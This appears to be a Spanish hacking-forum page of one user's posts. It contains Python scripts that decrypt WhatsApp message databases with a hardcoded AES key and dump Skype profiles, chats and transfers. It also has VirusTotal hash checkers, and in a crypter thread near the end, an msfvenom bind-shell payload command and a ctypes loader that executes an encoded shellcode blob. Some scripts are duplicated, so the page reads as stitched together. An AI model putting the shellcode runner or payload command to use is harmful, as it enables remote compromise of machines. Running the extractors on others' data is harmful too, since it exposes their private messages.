Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
· WhatsApp Metadata Extractor :
- main_manage.py (main de consola en forma de cliente)
- DB_Extractor.py (extrae los metadatos de la BD)
- metaimg_extractor.py (extrae los metadatos de los .jpg encontrados)# -*- coding: utf-8 *-*
import DB_Extractor, metaimg_extractor
class WhatsApp_Extractor():
def __init__(self):
self.__opt()
def __opt(self):
#Uncomment the OPTION that you want to use
#self.__opt1() #-> DB METADATA EXTRACTOR
self.__opt2() #-> IMG METADATA EXTRACTOR
#self.__opt3() #-> BOTH, OPT1 AND OPT2
def __opt1(self):
print "DB METADATA"
print "------------"
DB_Extractor.DB_Extractor()
print "------------"
def __opt2(self):
print "IMG META"
print "------------"
metaimg_extractor.IMG_Meta()
print "------------"
def __opt3(self):
print "DB METADATA"
print "------------"
DB_Extractor.DB_Extractor()
print "------------"
print "\nIMG META"
print "------------"
metaimg_extractor.IMG_Meta()
print "------------"
WhatsApp_Extractor()# -*- coding: utf-8 *-*
#Script to extract the metadata from the WhatsApp crypted DB
import sqlite3
from Crypto.Cipher import AES
class DB_Extractor():
def __init__(self):
self._manage_do()
def _manage_do(self):
try:
self.__DB_Breaker('msgstore.db.crypt')
self.__DB_conn()
self.__SQL_Consulter()
#Log exporter
except:
print "Error starting the script"
def __DB_Breaker(self, DBPath):
self.DBPath = DBPath
#breaking the hash
f = open(self.DBPath, 'rb')
key = "346a23652a46392b4d73257c67317e352e3372482177652c"
#triying to break the hash
try:
key = key.decode('hex')
cipher = AES.new(key, 1)
decoded = cipher.decrypt(f.read())
#Saving into a new db file
try:
decoded_DB = open('metadb.db', 'wb')
decoded_DB.write(decoded)
decoded_DB.close()
print "metadb.db has been created in the same directory"
except:
print "An error has ocurred creating the decoded DB"
except:
print "Error decoding the hash"
def __DB_conn(self):
#triying to connect with the sqlite database
try:
self.conn = sqlite3.connect('metadb.db')
self.consult = self.conn.cursor()
except:
print "An error has ocurred connecting with the SQLite DB"
def __SQL_Consulter(self):
#Divided in :
# Messages
# Chat_list
def __Messages():
#SQLConsult
try:
self.consult.execute("SELECT key_remote_jid, key_from_me, \
remote_resource, status, datetime(timestamp), data, media_url, media_mime_type, \
media_size, latitude, longitude FROM messages;")
except:
print "An error has ocurred doing the SQL Consult"
def __Shower():
#Message details
#nota : parsear status, comprobar si yo envio o recivo
for data in self.consult:
try:
print "\nMessages Details:"
print "----------------------"
if str(data[2]):
if str(data[1]) == '1':
print "From: me"
print "To: %s(group), integrant: %s"%(str(data[0]), str(data[2]))
else:
print "From: %s(group), integrant: %s"%(str(data[0]), str(data[2]))
print "To: me"
else:
if str(data[1]) == '1':
print "From: me"
print "To: " + str(data[0])
else:
print "From: " + str(data[0])
print "To: me"
print "Status: " + str(data[3])
print "Timestamp: " + str(data[4])
print "Message: " + str(data[5])
print "Media content: %s, type: %s, size: %s"%(str(data[6]), str(data[7]), str(data[8]))
print "Location(Lat: %s, Long: %s)"%(str(data[9]), str(data[10]))
print "----------------------"
except:
continue
print "ERROR showing message details"
__Shower()
def __Chat_list():
#SQLConsult
try:
self.consult.execute("SELECT id, \
key_remote_jid FROM chat_list;")
except:
print "An error has ocurred doing the SQL Consult"
def __Shower():
#Chat list details
for data in self.consult:
try:
print "\nChat_list"
print "ID: " + str(data[0])
print "Number: " + str(data[1])
print "----------------------"
except:
continue
print "ERROR showing chat list details"
__Shower()
#Initializing
__Messages()
__Chat_list()# -*- coding: utf-8 *-*
import os, exif
class IMG_Meta():
def __init__(self):
try:
self.__Media_extractor()
print "------------------------------------------------------\n"
self.__Profile_extractor()
except:
print "An error has ocurred starting the script"
def __Media_extractor(self):
try:
images = os.listdir('Media/WhatsApp Images/')
except:
print "An error has ocurred listing the files into the directory"
def __Shower():
for i in images:
print "-------------"
print i
obj = exif.extract_EXIF('Media/WhatsApp Images/%s' % i)
print "-------------"
__Shower()
def __Profile_extractor(self):
try:
images = os.listdir('Profile Pictures/')
except:
print "An error has ocurred listing the files into the directory"
def __Shower():
for i in images:
print "-------------"
print i
obj = exif.extract_EXIF('Profile Pictures/%s' % i)
print "-------------"
__Shower()
# -*- coding: utf-8 *-*
import DB_Extractor, metaimg_extractor
class WhatsApp_Extractor():
def __init__(self):
self.__opt()
def __opt(self):
#Uncomment the OPTION that you want to use
#self.__opt1() #-> DB METADATA EXTRACTOR
self.__opt2() #-> IMG METADATA EXTRACTOR
#self.__opt3() #-> BOTH, OPT1 AND OPT2
def __opt1(self):
print "DB METADATA"
print "------------"
DB_Extractor.DB_Extractor()
print "------------"
def __opt2(self):
print "IMG META"
print "------------"
metaimg_extractor.IMG_Meta()
print "------------"
def __opt3(self):
print "DB METADATA"
print "------------"
DB_Extractor.DB_Extractor()
print "------------"
print "\nIMG META"
print "------------"
metaimg_extractor.IMG_Meta()
print "------------"
WhatsApp_Extractor()# -*- coding: utf-8 *-*
#Script to extract the metadata from the WhatsApp crypted DB
import sqlite3
from Crypto.Cipher import AES
class DB_Extractor():
def __init__(self):
self._manage_do()
def _manage_do(self):
try:
self.__DB_Breaker('msgstore.db.crypt')
self.__DB_conn()
self.__SQL_Consulter()
#Log exporter
except:
print "Error starting the script"
def __DB_Breaker(self, DBPath):
self.DBPath = DBPath
#breaking the hash
f = open(self.DBPath, 'rb')
key = "346a23652a46392b4d73257c67317e352e3372482177652c"
#triying to break the hash
try:
key = key.decode('hex')
cipher = AES.new(key, 1)
decoded = cipher.decrypt(f.read())
#Saving into a new db file
try:
decoded_DB = open('metadb.db', 'wb')
decoded_DB.write(decoded)
decoded_DB.close()
print "metadb.db has been created in the same directory"
except:
print "An error has ocurred creating the decoded DB"
except:
print "Error decoding the hash"
def __DB_conn(self):
#triying to connect with the sqlite database
try:
self.conn = sqlite3.connect('metadb.db')
self.consult = self.conn.cursor()
except:
print "An error has ocurred connecting with the SQLite DB"
def __SQL_Consulter(self):
#Divided in :
# Messages
# Chat_list
def __Messages():
#SQLConsult
try:
self.consult.execute("SELECT key_remote_jid, key_from_me, \
remote_resource, status, datetime(timestamp), data, media_url, media_mime_type, \
media_size, latitude, longitude FROM messages;")
except:
print "An error has ocurred doing the SQL Consult"
def __Shower():
#Message details
#nota : parsear status, comprobar si yo envio o recivo
for data in self.consult:
try:
print "\nMessages Details:"
print "----------------------"
if str(data[2]):
if str(data[1]) == '1':
print "From: me"
print "To: %s(group), integrant: %s"%(str(data[0]), str(data[2]))
else:
print "From: %s(group), integrant: %s"%(str(data[0]), str(data[2]))
print "To: me"
else:
if str(data[1]) == '1':
print "From: me"
print "To: " + str(data[0])
else:
print "From: " + str(data[0])
print "To: me"
print "Status: " + str(data[3])
print "Timestamp: " + str(data[4])
print "Message: " + str(data[5])
print "Media content: %s, type: %s, size: %s"%(str(data[6]), str(data[7]), str(data[8]))
print "Location(Lat: %s, Long: %s)"%(str(data[9]), str(data[10]))
print "----------------------"
except:
continue
print "ERROR showing message details"
__Shower()
def __Chat_list():
#SQLConsult
try:
self.consult.execute("SELECT id, \
key_remote_jid FROM chat_list;")
except:
print "An error has ocurred doing the SQL Consult"
def __Shower():
#Chat list details
for data in self.consult:
try:
print "\nChat_list"
print "ID: " + str(data[0])
print "Number: " + str(data[1])
print "----------------------"
except:
continue
print "ERROR showing chat list details"
__Shower()
#Initializing
__Messages()
__Chat_list()# -*- coding: utf-8 *-*
import os, exif
class IMG_Meta():
def __init__(self):
try:
self.__Media_extractor()
print "------------------------------------------------------\n"
self.__Profile_extractor()
except:
print "An error has ocurred starting the script"
def __Media_extractor(self):
try:
images = os.listdir('Media/WhatsApp Images/')
except:
print "An error has ocurred listing the files into the directory"
def __Shower():
for i in images:
print "-------------"
print i
obj = exif.extract_EXIF('Media/WhatsApp Images/%s' % i)
print "-------------"
__Shower()
def __Profile_extractor(self):
try:
images = os.listdir('Profile Pictures/')
except:
print "An error has ocurred listing the files into the directory"
def __Shower():
for i in images:
print "-------------"
print i
obj = exif.extract_EXIF('Profile Pictures/%s' % i)
print "-------------"
__Shower()
, muy útil
# -*- coding: utf-8 *-*
import sqlite3
class Skype_Meta_Extractor():
def __init__(self, DBPath):
self.DBPath = DBPath
def __manager():
try:
self._Profile_Details()
self._Conver_Details()
self._Transfer_Details()
except:
print "An error has ocurred, please, try again"
__manager()
def __main_conn(self):
try:
#triying to connect with the sqlite database
conn = sqlite3.connect(self.DBPath)
self.consult = conn.cursor()
except:
print "Can't connect with the SQLite database'"
def _Profile_Details(self):
self.__main_conn()
try:
#SQL consult
self.consult.execute("SELECT fullname, skypename, emails, country, city, languages,\
datetime(profile_timestamp), datetime(avatar_timestamp),\
datetime(registration_timestamp) FROM accounts;")
except:
print "An error has ocurred doing the SQL consult"
def _another_info():
try:
#SQL consult
self.consult.execute("SELECT phone_mobile, datetime(birthday) FROM contacts;")
except:
print "An error has ocurred doing the SQL consult"
def __Shower():
print "Extra info: "
for data in self.consult:
try:
if data[0] and data[1]:
print "Phone: " + str(data[0])
print "Born Date: " + str(data[1])
else:
continue
except:
print "An error has ocurred showing the extra info"
continue
__Shower()
def __Shower():
#Showing metainfo
print "- Skype Profile Details"
for data in self.consult:
try:
print "---------------------------------------"
print "Full Name: " + str(data[0])
print "Skype Name: " + str(data[1])
print "Email: " + str(data[2])
print "Country: " + str(data[3])
print "City: " + str(data[4])
print "Language: " + str(data[5])
print "Last profile edition: " + str(data[6])
print "Last avatar edition: " + str(data[7])
print "Registration Date: " + str(data[8])
_another_info()
print "---------------------------------------"
except:
continue
print "ERROR : An error has ocurred showing the profile info"
__Shower()
def _Conver_Details(self):
self.__main_conn()
try:
#SQL Consult
self.consult.execute("SELECT datetime(timestamp), \
dialog_partner, author, body_xml FROM Messages;")
except:
print "An error has ocurred doing the SQL consult"
def __Shower():
#Showing metainfo
print "\n- Skype Conversations Details"
for data in self.consult:
try:
print "---------------------------------------"
print "Start of the conversation: " + str(data[0])
print "Author: " + str(data[2])
print "Receiver: " + str(data[1])
if data[3]:
print "Message: " + str(data[3].encode('utf-8'))
else:
print "Message: " + str(data[3])
print "---------------------------------------"
except:
continue
print "ERROR : An error has ocurred showing the Conversations info"
__Shower()
def _Transfer_Details(self):
self.__main_conn()
try:
#SQL Consult
self.consult.execute("SELECT partner_handle, partner_dispname, datetime(starttime),\
filepath, filename, filesize FROM transfers;")
except:
print "An error has ocurred doing the SQL consult"
def __Shower():
#Showing metainfo
print "\n- Skype Transfers Details"
for data in self.consult:
try:
print "---------------------------------------"
print "File receiver container: " + str(data[0]) + "/" + str(data[1])
print "Start time: " + str(data[2])
print "File path: " + str(data[3])
print "File name: " + str(data[4])
print "File size: " + str(data[5])
print "---------------------------------------"
except:
continue
print "ERROR : An error has ocurred showing the transfers info"
__Shower()
Skype_Meta_Extractor('main.db')
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login+10
No se aprende a programar cripters, se aprende a programar y cuando ya sabes programar puedes programar cripters o lo que quieras.
Yo te recomiendo C.
Un saludo.
# -*- coding: utf-8 *-*
#It's a simple script to search the hash of the file in VirusTotal
#and check if your file has been uploaded to VT
#Sanko
import urllib, urllib2, hashlib, sys
import simplejson as json
class VT_File_Checker():
def __init__(self, apikey, sFileName):
self.apikey = apikey
self.sFileName = sFileName
self._ms_do()
def _ms_do(self):
try:
self.__hash_extractor()
self._report_check()
self.__DataShower()
except:
print "Error, extracting the hash of the file"
def _report_check(self):
url = "https://www.virustotal.com/vtapi/v2/file/report"
parameters = {"resource": self.md5.hexdigest(), "apikey": self.apikey}
data = urllib.urlencode(parameters)
try:
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
re_json = response.read()
except:
print "Error connecting with the VT Api"
sys.exit(0)
#Parsing Json Data returned...
self.report = json.loads(re_json)
re_scan = self.report["scans"]
for self.av in re_scan:
self.detections = re_scan[self.av]["detected"]
self.results = re_scan[self.av]["result"]
try:
self.__parser()
except:
print "Error showing the returned data"
sys.exit(0)
def __parser(self):
if self.detections == True:
print "%s : %s"%(self.av, self.results)
elif self.detections == False:
print "%s : Ok"%(self.av)
else:
print "ERROR Parsing the scan results"
def __DataShower(self):
show = """
Extra Data :
------------
Name : %s
Scan_id : %s
Scan_date : %s
Permalink : %s
--------------
Detections : %s/%s
"""
print show%(self.sFileName, self.report["scan_id"], self.report["scan_date"],
self.report["permalink"], self.report["positives"], self.report["total"])
def __hash_extractor(self):
#opening sFileName
sFile = open(self.sFileName, 'rb')
self.md5 = hashlib.md5()
while True:
data = sFile.read(8192)
if not data:
break
self.md5.update(data)
#self.sha1 = hashlib.sha1()
#self.sha256 = hashlib.sha256()
VT_File_Checker('Aqui la key api', 'aquituejecutable.exe')
# -*- coding: utf-8 *-*
#It's a simple script to search the hash of the active processes in VirusTotal
#and check if your active processes are uploaded in VT or not
#Sanko
import urllib, urllib2, hashlib, sys, wmi
import simplejson as json
class VT_Process_Checker():
def __init__(self, apikey, sFileName):
self.apikey = apikey
self.sFileName = sFileName
self._ms_do()
def _ms_do(self):
try:
self.__hash_extractor()
self._process_report()
self.__DataShower()
except:
pass
def _process_report(self):
url = "https://www.virustotal.com/vtapi/v2/file/report"
parameters = {"resource": self.md5.hexdigest(), "apikey": self.apikey}
data = urllib.urlencode(parameters)
try:
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
re_json = response.read()
except:
print "Error connecting with the VT Api"
sys.exit(0)
#Parsing Json Data returned...
self.report = json.loads(re_json)
def __DataShower(self):
data = """
---------------------
Name : %s
MD5 Hash : %s
Scan_date : %s
Detections : %s/%s
Permanent Link : %s
---------------------
"""
print data%(self.sFileName, self.report["md5"], self.report["scan_date"],
self.report["positives"], self.report["total"], self.report["permalink"])
def __hash_extractor(self):
#opening sFileName
sFile = open(self.sFileName, 'rb')
self.md5 = hashlib.md5()
while True:
data = sFile.read(8192)
if not data:
break
self.md5.update(data)
#self.sha1 = hashlib.sha1()
#self.sha256 = hashlib.sha256()
c = wmi.WMI()
for process in c.Win32_Process ():
if process.executablepath == None:
continue
#Into my virtual machine some process have None value
else:
try:
VT_Process_Checker('Aqui tu api', process.executablepath)
except:
continue
windows/shell_bind_tcp LPORT=1337 Cmsfvenom --payload <ruta_del_payload> --encoder <algoritmo_de_codificacion> --iterations <numero_de_iteraciones_ algoritmo si el las permite > --bad-chars <caracteres_a_ignorar normalmente recomendado x00 >
from ctypes import *
shellcode = ("\xda\xd7\xd9\x74\x24\xf4\xbd\xf8\xd2\x02\xa0\x5a\x33\xc9" +
"\xb1\x78\x31\x6a\x17\x83\xea\xfc\x03\x92\xc1\xe0\x55\xdc" +
"\x32\x6b\xba\x51\x62\xb4\x1c\xe5\xb0\xc1\xc5\x2e\x70\x98" +
"\x8b\x01\xf0\xc8\xe8\x8b\x08\xed\x9c\x90\x9c\x28\xae\xa2" +
"\x17\xa9\x68\x3b\xd6\x8e\xa4\x3a\x6b\xef\x7d\xbc\x40\xfa" +
"\xf4\xd0\x6e\x8c\x6e\x44\xcc\x7d\xe7\x9d\x5a\x74\xde\x78" +
"\x7d\x3a\x6a\x45\x5a\xa6\x25\xb0\xfb\x36\x1e\x48\xb3\xf6" +
"\xa6\x22\xc6\x85\xe8\x33\x87\xbe\x1d\xfc\xab\x13\x02\xd4" +
"\x82\x2b\xa1\xe5\x3e\x3b\xb5\x51\x33\x50\x16\xa3\xe4\x9f" +
"\x25\xc3\xe8\x89\xd4\xb0\xd1\x83\x50\x20\xcb\x76\x0f\x2d" +
"\x8a\x31\xd9\x3b\xc8\x82\xdd\x65\x94\x57\x04\x3e\x7e\x69" +
"\xa6\x63\xc9\x06\x19\x9d\x49\xe9\x3d\x45\xf5\x19\x5b\xa0" +
"\x8a\x97\x33\xd2\x50\xe6\xff\xc7\xe7\xd6\xb4\x5e\xdd\xcc" +
"\x14\xfd\x18\xc6\xb9\x0c\xd6\xf7\xa4\x9b\xf7\x33\x4d\x56" +
"\xe0\x03\xd8\x8d\xf4\xe9\xde\xa9\xc3\x10\xd5\x8b\xcc\x86" +
"\xf5\x93\x42\x50\x9f\x45\xc9\x10\x4d\x92\x81\xe9\xb1\x85" +
"\xee\x43\xea\x72\x62\x37\x4b\x64\xc5\x0c\xd8\x64\xc0\x38" +
"\xa4\xe1\xad\xf7\xa1\x7e\x50\x52\x72\xac\xef\xd1\x74\x21" +
"\xf3\xe9\xe3\x65\xdb\x26\x48\xd0\x63\x87\x93\x22\x4b\x86" +
"\x0c\x80\x12\x27\x6a\x2e\x1d\x09\x7e\xee\xd1\x0f\xfe\xbe" +
"\x39\x8a\xb2\x55\x03\x4a\xb2\xc2\x79\x36\x9d\xd6\x29\xf4" +
"\xef\x71\xff\xa9\xde\x76\xbd\x62\x60\x52\x12\x8e\x48\x42" +
"\x7d\xaf\x5e\x5d\xc2\xe1\xcb\x39\xee\x86\xe2\x11\x07\xf9" +
"\x6d\x92\xfa\x56\xa2\x1a\xa4\x2d\x2c\x0f\x19\x20\xa2\x34" +
"\x5f\x64\x1a\x05\x87\xe9\xd0\xd5\xa0\xb3\x58\x38\x3b\x2c" +
"\x14\xd0\x74\x16\x46\x7b\x63\xbe\x0c\xae\x08\x9c\x03\x0d" +
"\xed\x06\x99\x2f\xcd\x67\x09\x12\x8c\x29\x6b\x92\x0b\xc5" +
"\x3f\x13\x25\x2a\x77\x5b\xf7\xd8\x63\x87\x46\xb8\xa5\x36" +
"\xc1\xc5\xd5\xcb\x55\xa4\x6f\xd6\x05\x45\x9f\xac\x41\xbe" +
"\xac\xbb\xb8\x03\x46\x04\xde\xd3\x64\x46\x81\x30\x93\x7d" +
"\xd3\x55\x34\xdf\x83\xc4\xde\xf3\x42\x86\x90\xbf\x92\xa0" +
"\x81\xdc\x5e\x05\xc4\x8e\x83\xdb\x6f\x90\xb2\x46\xb1\x2a" +
"\xcd\xd8\x03\x91\xde\x9f\x4e\x05\x75\x2b\x25\x2d\xeb\xfc" +
"\xe5\xa8\x48\xf6\x9f\x77\x8b\xc1\xf4\x78\x0b\xbf\xb4\xc7" +
"\xa6\xb7\x0b\x56\x92\x1b\x40\xc8\x37\x54\xa5\x86\x5b\xaf" +
"\xfd\xab\xa6\x68\xf6\x7b\x0c\xef\x3a\x04\x34\xbe\x55")
memoria = create_string_buffer(shellcode, len(shellcode))
shell = cast(memoria, CFUNCTYPE(c_void_p))
shell()
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or LoginXD claro que lo eres
¬¬ trollazo viste que lenguaje quiere realizar por lo tanto es para NT y no asi para UNIX lo que tienes que hacer es primero ver que tipo de injeccion (por asi decirlo) y jugar con la API de windows
EDIT: El idiota soy yo sankoncio.. lo siento. :$
Regards,
Snifer
